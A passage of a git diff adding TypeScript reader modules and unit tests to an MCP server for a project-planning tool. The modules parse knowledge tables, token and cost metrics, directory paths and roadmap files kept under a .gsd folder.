from 'node:fs'; +import { resolveGsdRoot, resolveRootFile } from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export type KnowledgeType = 'rule' | 'pattern' | 'lesson'; + +export interface KnowledgeEntry { + id: string; + type: KnowledgeType; + scope: string; + content: string; + addedAt: string; +} + +export interface KnowledgeResult { + entries: KnowledgeEntry[]; + counts: { rules: number; patterns: number; lessons: number }; +} + +// --------------------------------------------------------------------------- +// Parser +// --------------------------------------------------------------------------- + +function parseTableRows(section: string, type: KnowledgeType): KnowledgeEntry[] { + const entries: KnowledgeEntry[] = []; + const lines = section.split('\n'); + + for (const line of lines) { + if (!line.includes('|')) continue; + const cells = line.split('|').map((c) => c.trim()).filter(Boolean); + if (cells.length < 3) continue; + // Skip header/separator + if (cells[0].startsWith('#') || cells[0].startsWith('-')) continue; + + const id = cells[0]; + if (!/^[KPL]\d+$/i.test(id)) continue; + + if (type === 'rule' && cells.length >= 5) { + entries.push({ + id, type, scope: cells[1], content: cells[2], addedAt: cells[4] ?? '', + }); + } else if (type === 'pattern' && cells.length >= 4) { + entries.push({ + id, type, scope: cells[2] ?? '', content: cells[1], addedAt: cells[3] ?? '', + }); + } else if (type === 'lesson' && cells.length >= 5) { + entries.push({ + id, type, scope: cells[4] ?? 
'', + content: `${cells[1]} — Root cause: ${cells[2]} — Fix: ${cells[3]}`, + addedAt: '', + }); + } + } + + return entries; +} + +function parseKnowledgeMarkdown(content: string): KnowledgeEntry[] { + const entries: KnowledgeEntry[] = []; + + // Find ## Rules section + const rulesMatch = content.match(/## Rules\s*\n([\s\S]*?)(?=\n## |$)/i); + if (rulesMatch) { + entries.push(...parseTableRows(rulesMatch[1], 'rule')); + } + + // Find ## Patterns section + const patternsMatch = content.match(/## Patterns\s*\n([\s\S]*?)(?=\n## |$)/i); + if (patternsMatch) { + entries.push(...parseTableRows(patternsMatch[1], 'pattern')); + } + + // Find ## Lessons Learned section + const lessonsMatch = content.match(/## Lessons Learned\s*\n([\s\S]*?)(?=\n## |$)/i); + if (lessonsMatch) { + entries.push(...parseTableRows(lessonsMatch[1], 'lesson')); + } + + return entries; +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readKnowledge(projectDir: string): KnowledgeResult { + const gsd = resolveGsdRoot(projectDir); + const knowledgePath = resolveRootFile(gsd, 'KNOWLEDGE.md'); + + if (!existsSync(knowledgePath)) { + return { entries: [], counts: { rules: 0, patterns: 0, lessons: 0 } }; + } + + const content = readFileSync(knowledgePath, 'utf-8'); + const entries = parseKnowledgeMarkdown(content); + + return { + entries, + counts: { + rules: entries.filter((e) => e.type === 'rule').length, + patterns: entries.filter((e) => e.type === 'pattern').length, + lessons: entries.filter((e) => e.type === 'lesson').length, + }, + }; +} diff --git a/packages/mcp-server/src/readers/metrics.ts b/packages/mcp-server/src/readers/metrics.ts new file mode 100644 index 000000000..0b6635ceb --- /dev/null +++ b/packages/mcp-server/src/readers/metrics.ts @@ -0,0 +1,118 @@ +// GSD MCP Server — metrics/history reader +// Copyright (c) 2026 Jeremy McSpadden + +import 
{ readFileSync, existsSync } from 'node:fs'; +import { resolveGsdRoot, resolveRootFile } from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export interface MetricsUnit { + type: string; + id: string; + model: string; + startedAt: number; + finishedAt: number; + tokens: { + input: number; + output: number; + cacheRead: number; + cacheWrite: number; + total: number; + }; + cost: number; + toolCalls: number; + apiRequests: number; +} + +export interface HistoryResult { + entries: MetricsUnit[]; + totals: { + cost: number; + tokens: { input: number; output: number; total: number }; + units: number; + durationMs: number; + }; +} + +// --------------------------------------------------------------------------- +// Parser +// --------------------------------------------------------------------------- + +function parseMetricsJson(content: string): MetricsUnit[] { + try { + const data = JSON.parse(content); + if (!data.units || !Array.isArray(data.units)) return []; + + return data.units.map((u: Record) => ({ + type: String(u.type ?? 'unknown'), + id: String(u.id ?? ''), + model: String(u.model ?? 'unknown'), + startedAt: Number(u.startedAt ?? 0), + finishedAt: Number(u.finishedAt ?? 0), + tokens: { + input: Number((u.tokens as Record)?.input ?? 0), + output: Number((u.tokens as Record)?.output ?? 0), + cacheRead: Number((u.tokens as Record)?.cacheRead ?? 0), + cacheWrite: Number((u.tokens as Record)?.cacheWrite ?? 0), + total: Number((u.tokens as Record)?.total ?? 0), + }, + cost: Number(u.cost ?? 0), + toolCalls: Number(u.toolCalls ?? 0), + apiRequests: Number(u.apiRequests ?? 
0), + })); + } catch { + return []; + } +} + +// --------------------------------------------------------------------------- +// Public API +// --------------------------------------------------------------------------- + +export function readHistory(projectDir: string, limit?: number): HistoryResult { + const gsd = resolveGsdRoot(projectDir); + + // metrics.json (primary) + const metricsPath = resolveRootFile(gsd, 'metrics.json'); + let units: MetricsUnit[] = []; + + if (existsSync(metricsPath)) { + const content = readFileSync(metricsPath, 'utf-8'); + units = parseMetricsJson(content); + } + + // Sort by startedAt descending (most recent first) + units.sort((a, b) => b.startedAt - a.startedAt); + + // Apply limit + if (limit && limit > 0) { + units = units.slice(0, limit); + } + + // Compute totals from ALL units (not just limited set) + const allUnits = existsSync(metricsPath) + ? parseMetricsJson(readFileSync(metricsPath, 'utf-8')) + : []; + + const totals = { + cost: 0, + tokens: { input: 0, output: 0, total: 0 }, + units: allUnits.length, + durationMs: 0, + }; + + for (const u of allUnits) { + totals.cost += u.cost; + totals.tokens.input += u.tokens.input; + totals.tokens.output += u.tokens.output; + totals.tokens.total += u.tokens.total; + totals.durationMs += (u.finishedAt - u.startedAt); + } + + // Round cost to 4 decimal places + totals.cost = Math.round(totals.cost * 10000) / 10000; + + return { entries: units, totals }; +} diff --git a/packages/mcp-server/src/readers/paths.ts b/packages/mcp-server/src/readers/paths.ts new file mode 100644 index 000000000..ad0418a36 --- /dev/null +++ b/packages/mcp-server/src/readers/paths.ts @@ -0,0 +1,217 @@ +// GSD MCP Server — .gsd/ directory resolution +// Copyright (c) 2026 Jeremy McSpadden + +import { existsSync, statSync, readdirSync } from 'node:fs'; +import { join, resolve, dirname, basename } from 'node:path'; +import { execFileSync } from 'node:child_process'; + +/** + * Resolve the .gsd/ root directory for a 
project. + * + * Probes in order: + * 1. projectDir/.gsd (fast path) + * 2. git repo root/.gsd + * 3. Walk up from projectDir + * 4. Fallback: projectDir/.gsd (even if missing — for init) + */ +export function resolveGsdRoot(projectDir: string): string { + const resolved = resolve(projectDir); + + // Fast path: .gsd/ in the given directory + const direct = join(resolved, '.gsd'); + if (existsSync(direct) && statSync(direct).isDirectory()) { + return direct; + } + + // Try git repo root + try { + const gitRoot = execFileSync('git', ['rev-parse', '--show-toplevel'], { + cwd: resolved, + encoding: 'utf-8', + stdio: ['pipe', 'pipe', 'pipe'], + }).trim(); + const gitGsd = join(gitRoot, '.gsd'); + if (existsSync(gitGsd) && statSync(gitGsd).isDirectory()) { + return gitGsd; + } + } catch { + // Not a git repo or git not available + } + + // Walk up from projectDir + let dir = resolved; + while (dir !== dirname(dir)) { + const candidate = join(dir, '.gsd'); + if (existsSync(candidate) && statSync(candidate).isDirectory()) { + return candidate; + } + dir = dirname(dir); + } + + // Fallback + return direct; +} + +/** Resolve path to a .gsd/ root file (STATE.md, KNOWLEDGE.md, etc.) */ +export function resolveRootFile(gsdRoot: string, name: string): string { + return join(gsdRoot, name); +} + +/** Resolve path to milestones directory */ +export function milestonesDir(gsdRoot: string): string { + return join(gsdRoot, 'milestones'); +} + +/** + * Find all milestone directory IDs (M001, M002, etc.). + * Handles both bare (M001/) and descriptor (M001-FLIGHT-SIM/) naming. 
+ */ +export function findMilestoneIds(gsdRoot: string): string[] { + const dir = milestonesDir(gsdRoot); + if (!existsSync(dir)) return []; + + const entries = readdirSync(dir, { withFileTypes: true }); + const ids: string[] = []; + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + const match = entry.name.match(/^(M\d+)/); + if (match) ids.push(match[1]); + } + + return ids.sort(); +} + +/** + * Resolve the actual directory name for a milestone ID. + * M001 might live in M001/ or M001-SOME-DESCRIPTOR/. + */ +export function resolveMilestoneDir(gsdRoot: string, milestoneId: string): string | null { + const dir = milestonesDir(gsdRoot); + if (!existsSync(dir)) return null; + + // Fast path: exact match + const exact = join(dir, milestoneId); + if (existsSync(exact) && statSync(exact).isDirectory()) return exact; + + // Prefix match + const entries = readdirSync(dir, { withFileTypes: true }); + for (const entry of entries) { + if (entry.isDirectory() && entry.name.startsWith(milestoneId)) { + return join(dir, entry.name); + } + } + + return null; +} + +/** + * Resolve a milestone-level file (M001-ROADMAP.md, M001-CONTEXT.md, etc.). + * Handles various naming conventions. + */ +export function resolveMilestoneFile(gsdRoot: string, milestoneId: string, suffix: string): string | null { + const mDir = resolveMilestoneDir(gsdRoot, milestoneId); + if (!mDir) return null; + + const dirName = basename(mDir); + + // Try: M001-ROADMAP.md, then DIRNAME-ROADMAP.md + const candidates = [ + join(mDir, `${milestoneId}-${suffix}.md`), + join(mDir, `${dirName}-${suffix}.md`), + join(mDir, `${suffix}.md`), + ]; + + for (const c of candidates) { + if (existsSync(c)) return c; + } + return null; +} + +/** Find all slice IDs within a milestone (S01, S02, etc.) 
*/ +export function findSliceIds(gsdRoot: string, milestoneId: string): string[] { + const mDir = resolveMilestoneDir(gsdRoot, milestoneId); + if (!mDir) return []; + + const slicesDir = join(mDir, 'slices'); + if (!existsSync(slicesDir)) return []; + + const entries = readdirSync(slicesDir, { withFileTypes: true }); + const ids: string[] = []; + + for (const entry of entries) { + if (!entry.isDirectory()) continue; + const match = entry.name.match(/^(S\d+)/); + if (match) ids.push(match[1]); + } + + return ids.sort(); +} + +/** Resolve the actual directory for a slice */ +export function resolveSliceDir(gsdRoot: string, milestoneId: string, sliceId: string): string | null { + const mDir = resolveMilestoneDir(gsdRoot, milestoneId); + if (!mDir) return null; + + const slicesDir = join(mDir, 'slices'); + if (!existsSync(slicesDir)) return null; + + const exact = join(slicesDir, sliceId); + if (existsSync(exact) && statSync(exact).isDirectory()) return exact; + + const entries = readdirSync(slicesDir, { withFileTypes: true }); + for (const entry of entries) { + if (entry.isDirectory() && entry.name.startsWith(sliceId)) { + return join(slicesDir, entry.name); + } + } + return null; +} + +/** Resolve a slice-level file (S01-PLAN.md, etc.) 
*/ +export function resolveSliceFile( + gsdRoot: string, milestoneId: string, sliceId: string, suffix: string, +): string | null { + const sDir = resolveSliceDir(gsdRoot, milestoneId, sliceId); + if (!sDir) return null; + + const dirName = basename(sDir); + const candidates = [ + join(sDir, `${sliceId}-${suffix}.md`), + join(sDir, `${dirName}-${suffix}.md`), + join(sDir, `${suffix}.md`), + ]; + + for (const c of candidates) { + if (existsSync(c)) return c; + } + return null; +} + +/** Find all task files in a slice's tasks/ directory */ +export function findTaskFiles( + gsdRoot: string, milestoneId: string, sliceId: string, +): Array<{ id: string; hasPlan: boolean; hasSummary: boolean }> { + const sDir = resolveSliceDir(gsdRoot, milestoneId, sliceId); + if (!sDir) return []; + + const tasksDir = join(sDir, 'tasks'); + if (!existsSync(tasksDir)) return []; + + const files = readdirSync(tasksDir); + const taskMap = new Map(); + + for (const f of files) { + const match = f.match(/^(T\d+).*-(PLAN|SUMMARY)\.md$/i); + if (!match) continue; + const [, id, type] = match; + const existing = taskMap.get(id) ?? 
{ hasPlan: false, hasSummary: false }; + if (type.toUpperCase() === 'PLAN') existing.hasPlan = true; + if (type.toUpperCase() === 'SUMMARY') existing.hasSummary = true; + taskMap.set(id, existing); + } + + return Array.from(taskMap.entries()) + .map(([id, info]) => ({ id, ...info })) + .sort((a, b) => a.id.localeCompare(b.id)); +} diff --git a/packages/mcp-server/src/readers/readers.test.ts b/packages/mcp-server/src/readers/readers.test.ts new file mode 100644 index 000000000..98d157279 --- /dev/null +++ b/packages/mcp-server/src/readers/readers.test.ts @@ -0,0 +1,509 @@ +// GSD MCP Server — reader tests +// Copyright (c) 2026 Jeremy McSpadden + +import { describe, it, before, after } from 'node:test'; +import assert from 'node:assert/strict'; +import { mkdirSync, writeFileSync, rmSync } from 'node:fs'; +import { join } from 'node:path'; +import { tmpdir } from 'node:os'; +import { randomBytes } from 'node:crypto'; + +import { readProgress } from './state.js'; +import { readRoadmap } from './roadmap.js'; +import { readHistory } from './metrics.js'; +import { readCaptures } from './captures.js'; +import { readKnowledge } from './knowledge.js'; +import { runDoctorLite } from './doctor-lite.js'; + +// --------------------------------------------------------------------------- +// Test fixture helpers +// --------------------------------------------------------------------------- + +function tmpProject(): string { + const dir = join(tmpdir(), `gsd-mcp-test-${randomBytes(4).toString('hex')}`); + mkdirSync(dir, { recursive: true }); + return dir; +} + +function writeFixture(base: string, relPath: string, content: string): void { + const full = join(base, relPath); + mkdirSync(join(full, '..'), { recursive: true }); + writeFileSync(full, content, 'utf-8'); +} + +// --------------------------------------------------------------------------- +// readProgress tests +// --------------------------------------------------------------------------- + +describe('readProgress', () 
=> { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + + writeFixture(projectDir, '.gsd/STATE.md', `# GSD State + +**Active Milestone:** M002: Auth System +**Active Slice:** S01: Login flow +**Phase:** execution +**Requirements Status:** 5 active · 2 validated · 1 deferred · 0 out of scope + +## Milestone Registry + +- ☑ **M001:** Core Setup +- 🔄 **M002:** Auth System +- ⬜ **M003:** Dashboard + +## Blockers + +- Waiting on OAuth provider approval + +## Next Action + +Execute T02 in S01 — implement token refresh. +`); + + // Create filesystem structure + const m1 = '.gsd/milestones/M001/slices/S01/tasks'; + writeFixture(projectDir, `${m1}/T01-PLAN.md`, '# T01'); + writeFixture(projectDir, `${m1}/T01-SUMMARY.md`, '# T01 done'); + + const m2 = '.gsd/milestones/M002/slices/S01/tasks'; + writeFixture(projectDir, `${m2}/T01-PLAN.md`, '# T01'); + writeFixture(projectDir, `${m2}/T01-SUMMARY.md`, '# T01 done'); + writeFixture(projectDir, `${m2}/T02-PLAN.md`, '# T02'); + + mkdirSync(join(projectDir, '.gsd/milestones/M003'), { recursive: true }); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('parses active milestone from STATE.md', () => { + const result = readProgress(projectDir); + assert.deepEqual(result.activeMilestone, { id: 'M002', title: 'Auth System' }); + }); + + it('parses active slice', () => { + const result = readProgress(projectDir); + assert.deepEqual(result.activeSlice, { id: 'S01', title: 'Login flow' }); + }); + + it('parses phase', () => { + const result = readProgress(projectDir); + assert.equal(result.phase, 'execute'); + }); + + it('parses milestone counts from registry', () => { + const result = readProgress(projectDir); + assert.equal(result.milestones.total, 3); + assert.equal(result.milestones.done, 1); + assert.equal(result.milestones.active, 1); + assert.equal(result.milestones.pending, 1); + }); + + it('counts tasks from filesystem', () => { + const result = readProgress(projectDir); 
+ assert.equal(result.tasks.total, 3); + assert.equal(result.tasks.done, 2); + assert.equal(result.tasks.pending, 1); + }); + + it('parses blockers', () => { + const result = readProgress(projectDir); + assert.equal(result.blockers.length, 1); + assert.ok(result.blockers[0].includes('OAuth')); + }); + + it('parses requirements', () => { + const result = readProgress(projectDir); + assert.equal(result.requirements?.active, 5); + assert.equal(result.requirements?.validated, 2); + assert.equal(result.requirements?.deferred, 1); + }); + + it('parses next action', () => { + const result = readProgress(projectDir); + assert.ok(result.nextAction.includes('T02')); + }); + + it('returns defaults for missing .gsd/', () => { + const empty = tmpProject(); + const result = readProgress(empty); + assert.equal(result.phase, 'unknown'); + assert.equal(result.milestones.total, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// readRoadmap tests +// --------------------------------------------------------------------------- + +describe('readRoadmap', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + + writeFixture(projectDir, '.gsd/milestones/M001/M001-CONTEXT.md', '# M001: Core Setup\n'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-ROADMAP.md', `# M001: Core Setup + +## Vision + +Build the foundation for the project. 
+ +## Slice Overview + +| ID | Slice | Risk | Depends | Done | After this | +|----|-------|------|---------|------|------------| +| S01 | Database schema | low | — | ☑ | DB ready | +| S02 | API endpoints | medium | S01 | 🟫 | REST API live | +`); + + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/S01-PLAN.md', `# S01: Database schema + +## Tasks + +- [x] **T01: Create migrations** — Set up schema +- [x] **T02: Seed data** — Initial seed +`); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '# T01 done'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T02-PLAN.md', '# T02'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T02-SUMMARY.md', '# T02 done'); + + writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/S02-PLAN.md', `# S02: API endpoints + +## Tasks + +- [ ] **T01: Auth routes** — Implement auth +- [ ] **T02: User routes** — CRUD users +`); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/tasks/T02-PLAN.md', '# T02'); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('returns milestone structure', () => { + const result = readRoadmap(projectDir); + assert.equal(result.milestones.length, 1); + assert.equal(result.milestones[0].id, 'M001'); + assert.equal(result.milestones[0].title, 'Core Setup'); + }); + + it('reads vision from roadmap', () => { + const result = readRoadmap(projectDir); + assert.ok(result.milestones[0].vision.includes('foundation')); + }); + + it('parses slices from roadmap table', () => { + const result = readRoadmap(projectDir); + const slices = result.milestones[0].slices; + assert.equal(slices.length, 2); + assert.equal(slices[0].id, 'S01'); + assert.equal(slices[0].title, 'Database schema'); + assert.equal(slices[1].id, 'S02'); + }); 
+ + it('derives slice status from task summaries', () => { + const result = readRoadmap(projectDir); + const slices = result.milestones[0].slices; + assert.equal(slices[0].status, 'done'); + assert.equal(slices[1].status, 'pending'); + }); + + it('includes tasks in slices', () => { + const result = readRoadmap(projectDir); + const s01Tasks = result.milestones[0].slices[0].tasks; + assert.equal(s01Tasks.length, 2); + assert.equal(s01Tasks[0].status, 'done'); + }); + + it('filters by milestoneId', () => { + const result = readRoadmap(projectDir, 'M999'); + assert.equal(result.milestones.length, 0); + }); +}); + +// --------------------------------------------------------------------------- +// readHistory tests +// --------------------------------------------------------------------------- + +describe('readHistory', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + writeFixture(projectDir, '.gsd/metrics.json', JSON.stringify({ + version: 1, + projectStartedAt: 1700000000000, + units: [ + { + type: 'execute-task', + id: 'M001/S01/T01', + model: 'claude-sonnet-4', + startedAt: 1700001000000, + finishedAt: 1700002000000, + tokens: { input: 10000, output: 3000, cacheRead: 2000, cacheWrite: 1000, total: 16000 }, + cost: 0.05, + toolCalls: 8, + apiRequests: 3, + }, + { + type: 'execute-task', + id: 'M001/S01/T02', + model: 'claude-sonnet-4', + startedAt: 1700003000000, + finishedAt: 1700004000000, + tokens: { input: 15000, output: 5000, cacheRead: 3000, cacheWrite: 1500, total: 24500 }, + cost: 0.08, + toolCalls: 12, + apiRequests: 5, + }, + ], + })); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('returns all entries sorted by most recent', () => { + const result = readHistory(projectDir); + assert.equal(result.entries.length, 2); + assert.equal(result.entries[0].id, 'M001/S01/T02'); // most recent first + }); + + it('computes totals', () => { + const result = readHistory(projectDir); + 
assert.equal(result.totals.units, 2); + assert.equal(result.totals.cost, 0.13); + assert.equal(result.totals.tokens.total, 40500); + }); + + it('respects limit', () => { + const result = readHistory(projectDir, 1); + assert.equal(result.entries.length, 1); + assert.equal(result.totals.units, 2); // totals still reflect all + }); + + it('returns empty for missing metrics', () => { + const empty = tmpProject(); + mkdirSync(join(empty, '.gsd'), { recursive: true }); + const result = readHistory(empty); + assert.equal(result.entries.length, 0); + assert.equal(result.totals.units, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// readCaptures tests +// --------------------------------------------------------------------------- + +describe('readCaptures', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + writeFixture(projectDir, '.gsd/CAPTURES.md', `# Captures + +### CAP-aaa11111 + +**Text:** Add rate limiting to API +**Captured:** 2026-04-01T10:00:00Z +**Status:** pending + +### CAP-bbb22222 + +**Text:** Refactor auth module +**Captured:** 2026-04-02T10:00:00Z +**Status:** resolved +**Classification:** inject +**Resolution:** Added to M003 roadmap +**Rationale:** Important for security +**Resolved:** 2026-04-03T10:00:00Z +**Milestone:** M003 + +### CAP-ccc33333 + +**Text:** Nice to have: dark mode +**Captured:** 2026-04-02T11:00:00Z +**Status:** resolved +**Classification:** defer +**Resolution:** Deferred to future +**Rationale:** Not blocking +**Resolved:** 2026-04-03T11:00:00Z +`); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('reads all captures', () => { + const result = readCaptures(projectDir, 'all'); + assert.equal(result.captures.length, 3); + assert.equal(result.counts.total, 3); + }); + + it('filters pending captures', () => { + const result = readCaptures(projectDir, 'pending'); + 
assert.equal(result.captures.length, 1); + assert.equal(result.captures[0].id, 'CAP-aaa11111'); + }); + + it('filters actionable captures (inject, replan, quick-task)', () => { + const result = readCaptures(projectDir, 'actionable'); + assert.equal(result.captures.length, 1); + assert.equal(result.captures[0].id, 'CAP-bbb22222'); + }); + + it('counts correctly regardless of filter', () => { + const result = readCaptures(projectDir, 'pending'); + assert.equal(result.counts.total, 3); + assert.equal(result.counts.pending, 1); + assert.equal(result.counts.actionable, 1); + }); + + it('returns empty for missing CAPTURES.md', () => { + const empty = tmpProject(); + mkdirSync(join(empty, '.gsd'), { recursive: true }); + const result = readCaptures(empty); + assert.equal(result.captures.length, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// readKnowledge tests +// --------------------------------------------------------------------------- + +describe('readKnowledge', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + writeFixture(projectDir, '.gsd/KNOWLEDGE.md', `# Project Knowledge + +## Rules + +| # | Scope | Rule | Why | Added | +|---|-------|------|-----|-------| +| K001 | auth | Hash passwords with bcrypt | Security requirement | manual | +| K002 | db | Use transactions for multi-table | Data consistency | auto | + +## Patterns + +| # | Pattern | Where | Notes | +|---|---------|-------|-------| +| P001 | Singleton services | services/ | Prevents duplication | + +## Lessons Learned + +| # | What Happened | Root Cause | Fix | Scope | +|---|--------------|------------|-----|-------| +| L001 | CI tests failed | Env diff | Added setup script | testing | +`); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('reads all knowledge entries', () => { + const result = readKnowledge(projectDir); + 
assert.equal(result.entries.length, 4); + }); + + it('counts by type', () => { + const result = readKnowledge(projectDir); + assert.equal(result.counts.rules, 2); + assert.equal(result.counts.patterns, 1); + assert.equal(result.counts.lessons, 1); + }); + + it('parses rule fields correctly', () => { + const result = readKnowledge(projectDir); + const k001 = result.entries.find((e) => e.id === 'K001'); + assert.ok(k001); + assert.equal(k001.type, 'rule'); + assert.equal(k001.scope, 'auth'); + assert.ok(k001.content.includes('bcrypt')); + }); + + it('returns empty for missing KNOWLEDGE.md', () => { + const empty = tmpProject(); + mkdirSync(join(empty, '.gsd'), { recursive: true }); + const result = readKnowledge(empty); + assert.equal(result.entries.length, 0); + rmSync(empty, { recursive: true, force: true }); + }); +}); + +// --------------------------------------------------------------------------- +// runDoctorLite tests +// --------------------------------------------------------------------------- + +describe('runDoctorLite', () => { + let projectDir: string; + + before(() => { + projectDir = tmpProject(); + + // M001: complete milestone (has summary) + writeFixture(projectDir, '.gsd/PROJECT.md', '# Test Project'); + writeFixture(projectDir, '.gsd/STATE.md', '# GSD State'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-CONTEXT.md', '# M001'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-ROADMAP.md', '# Roadmap'); + writeFixture(projectDir, '.gsd/milestones/M001/M001-SUMMARY.md', '# Done'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/S01-PLAN.md', '# Plan'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '# T01 done'); + + // M002: incomplete — has all tasks done but no SUMMARY + writeFixture(projectDir, '.gsd/milestones/M002/M002-CONTEXT.md', '# M002'); + writeFixture(projectDir, 
'.gsd/milestones/M002/M002-ROADMAP.md', '# Roadmap'); + writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/S01-PLAN.md', '# Plan'); + writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/tasks/T01-PLAN.md', '# T01'); + writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/tasks/T01-SUMMARY.md', '# T01 done'); + + // M003: empty — no context, no slices + mkdirSync(join(projectDir, '.gsd/milestones/M003'), { recursive: true }); + }); + + after(() => rmSync(projectDir, { recursive: true, force: true })); + + it('detects all-slices-done-missing-summary', () => { + const result = runDoctorLite(projectDir); + const issue = result.issues.find((i) => i.code === 'all_slices_done_missing_summary'); + assert.ok(issue, 'Should detect M002 missing summary'); + assert.equal(issue.unitId, 'M002'); + }); + + it('detects missing context', () => { + const result = runDoctorLite(projectDir); + const issue = result.issues.find( + (i) => i.code === 'missing_context' && i.unitId === 'M003', + ); + assert.ok(issue, 'Should detect M003 missing context'); + }); + + it('scopes to a single milestone', () => { + const result = runDoctorLite(projectDir, 'M001'); + const m002Issues = result.issues.filter((i) => i.unitId.startsWith('M002')); + assert.equal(m002Issues.length, 0, 'Should not include M002 when scoped to M001'); + }); + + it('returns ok:true for healthy project', () => { + const healthy = tmpProject(); + writeFixture(healthy, '.gsd/PROJECT.md', '# Project'); + writeFixture(healthy, '.gsd/STATE.md', '# State'); + const result = runDoctorLite(healthy); + assert.equal(result.ok, true); + rmSync(healthy, { recursive: true, force: true }); + }); + + it('handles missing .gsd/ gracefully', () => { + const empty = tmpProject(); + const result = runDoctorLite(empty); + assert.equal(result.ok, true); + assert.equal(result.issues[0].code, 'no_gsd_directory'); + rmSync(empty, { recursive: true, force: true }); + }); +}); diff --git a/packages/mcp-server/src/readers/roadmap.ts 
b/packages/mcp-server/src/readers/roadmap.ts new file mode 100644 index 000000000..29a6e1941 --- /dev/null +++ b/packages/mcp-server/src/readers/roadmap.ts @@ -0,0 +1,263 @@ +// GSD MCP Server — roadmap structure reader +// Copyright (c) 2026 Jeremy McSpadden + +import { readFileSync, existsSync } from 'node:fs'; +import { + resolveGsdRoot, + findMilestoneIds, + resolveMilestoneFile, + findSliceIds, + resolveSliceFile, + findTaskFiles, +} from './paths.js'; + +// --------------------------------------------------------------------------- +// Types +// --------------------------------------------------------------------------- + +export interface TaskInfo { + id: string; + title: string; + status: 'done' | 'pending'; +} + +export interface SliceInfo { + id: string; + title: string; + status: 'done' | 'active' | 'pending'; + risk: string; + depends: string[]; + demo: string; + tasks: TaskInfo[]; +} + +export interface MilestoneInfo { + id: string; + title: string; + status: 'done' | 'active' | 'pending' | 'parked'; + vision: string; + slices: SliceInfo[]; +} + +export interface RoadmapResult { + milestones: MilestoneInfo[]; +} + +// --------------------------------------------------------------------------- +// ROADMAP.md table parser +// --------------------------------------------------------------------------- + +function parseRoadmapTable(content: string): Array<{ + id: string; title: string; risk: string; depends: string[]; done: boolean; demo: string; +}> { + const results: Array<{ + id: string; title: string; risk: string; depends: string[]; done: boolean; demo: string; + }> = []; + + // Try table format first: | S01 | Title | risk | depends | done-icon | demo | + const tableSection = content.match(/## (?:Slice[s]?|Slice Overview|Slice Table)\s*\n([\s\S]*?)(?=\n##|\n$|$)/i); + if (tableSection) { + const lines = tableSection[1].split('\n'); + for (const line of lines) { + if (!line.includes('|')) continue; + const cells = line.split('|').map((c) => 
c.trim()).filter(Boolean); + if (cells.length < 4) continue; + if (cells[0] === 'ID' || cells[0].startsWith('--')) continue; + + const id = cells[0].match(/S\d+/)?.[0]; + if (!id) continue; + + const done = cells.some((c) => c === '\u2611' || c === '\u2705' || c.toLowerCase() === 'done'); + const depends = (cells[3] ?? '').replace(/\u2014/g, '').split(',').map((d) => d.trim()).filter(Boolean); + + results.push({ + id, + title: cells[1] ?? '', + risk: cells[2] ?? 'medium', + depends, + done, + demo: cells[5] ?? '', + }); + } + if (results.length > 0) return results; + } + + // Try checkbox format: - [x] **S01: Title** `risk:high` `depends:[S01]` + const checkboxRe = /^-\s+\[([ xX])\]\s+\*\*(S\d+):\s*(.+?)\*\*(?:.*?`risk:(\w+)`)?(?:.*?`depends:\[([^\]]*)\]`)?/gm; + let match: RegExpExecArray | null; + while ((match = checkboxRe.exec(content)) !== null) { + const [, checked, id, title, risk, deps] = match; + results.push({ + id, + title: title.trim(), + risk: risk ?? 'medium', + depends: deps ? 
deps.split(',').map((d) => d.trim()).filter(Boolean) : [], + done: checked !== ' ', + demo: '', + }); + } + if (results.length > 0) return results; + + // Try prose headers: ## S01: Title + const headerRe = /^##\s+(S\d+):\s*(.+)/gm; + while ((match = headerRe.exec(content)) !== null) { + results.push({ + id: match[1], + title: match[2].trim(), + risk: 'medium', + depends: [], + done: false, + demo: '', + }); + } + + return results; +} + +// --------------------------------------------------------------------------- +// PLAN.md task parser +// --------------------------------------------------------------------------- + +function parseSlicePlanTasks(content: string): Array<{ id: string; title: string; done: boolean }> { + const results: Array<{ id: string; title: string; done: boolean }> = []; + + // Checkbox format: - [x] **T01: Title** — description + const taskRe = /^-\s+\[([ xX])\]\s+\*\*(T\d+):\s*(.+?)\*\*/gm; + let match: RegExpExecArray | null; + while ((match = taskRe.exec(content)) !== null) { + results.push({ + id: match[2], + title: match[3].trim(), + done: match[1] !== ' ', + 